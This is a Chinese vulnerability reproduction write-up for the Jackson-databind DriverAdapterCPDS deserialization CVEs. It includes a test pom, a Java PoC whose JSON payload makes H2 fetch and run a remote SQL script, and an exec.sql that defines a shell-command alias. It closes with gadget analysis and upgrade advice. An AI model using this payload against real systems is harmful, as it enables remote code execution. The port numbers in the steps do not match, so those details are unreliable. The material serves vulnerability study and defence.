影响范围
Jackson-databind < 2.9.10.7
漏洞类型
JDNI注入导致RCE
利用条件
- 开启enableDefaultTyping()
- 使用了org.apache.servicemix.bundles第三方依赖库
漏洞概述
以下类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成SSRF&RCE:
- CVE-2020-36179:org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS
- CVE-2020-36180: org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS
- CVE-2020-36181: org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS
- CVE-2020-36182: org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS
漏洞复现
环境搭建
pom.xml
代码语言:javascript复制<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>com.jacksonTest</groupId>
<artifactId>jacksonTest</artifactId>
<version>1.0-SNAPSHOT</version>
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.10.7</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.commons/commons-dbcp2 -->
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-dbcp2</artifactId>
<version>2.8.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/com.h2database/h2 -->
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<version>1.4.199</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-nop</artifactId>
<version>1.7.2</version>
</dependency>
<!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
</dependency>
</dependencies>
</project>漏洞利用
https://github.com/Al1ex/CVE-2020-36179
构造exec.sql
代码语言:javascript复制CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('calc.exe')简易web服务
代码语言:javascript复制python2 -m simpleHTTPServer 4444
执行漏洞POC1
poc.java代码如下所示:
代码语言:javascript复制import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class POC {
public static void main(String[] args) throws Exception {
String payload = "["org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:3333/exec.sql'"}]";
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
Object obj = mapper.readValue(payload, Object.class);
mapper.writeValueAsString(obj);
}
}之后运行该程序,成功执行命令,弹出计算器:
漏洞分析
org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS类中提供了对url的set方法,可以通过反序列化进行赋值操作,同时在getConnection中通过DriverManager.getConnection()进行远程连接,参数url可控,从而可导致SSRF,当classpath中存在h2数据库时甚至可以导致RCE:
Gadget如下:
代码语言:javascript复制DriverAdapterCPDS
->seturl
->getPooledConnection
->DirverManager.getConnection(this.url,username,pass)修复建议
- 及时将jackson-databind升级到安全版本(>2.9.10.7)
- 升级到较高版本的JDK
